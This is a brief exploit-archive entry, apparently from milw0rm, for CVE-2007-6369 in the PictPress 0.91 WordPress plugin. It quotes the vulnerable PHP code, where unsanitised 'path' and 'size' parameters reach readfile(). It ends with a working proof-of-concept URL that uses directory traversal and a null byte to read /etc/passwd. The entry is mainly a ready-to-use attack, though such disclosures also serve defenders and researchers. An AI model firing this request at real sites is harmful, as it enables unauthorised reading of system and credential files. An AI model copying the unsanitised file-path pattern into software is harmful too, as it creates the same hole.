WordPress Plugin PictPress 0.91 - Remote File Disclosure



EKU-ID: 12649 CVE: OSVDB-39513;CVE-2007-6369 OSVDB-ID:
Author: GoLd_M Published: 2007-12-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# milw0rm.com [2007-12-05]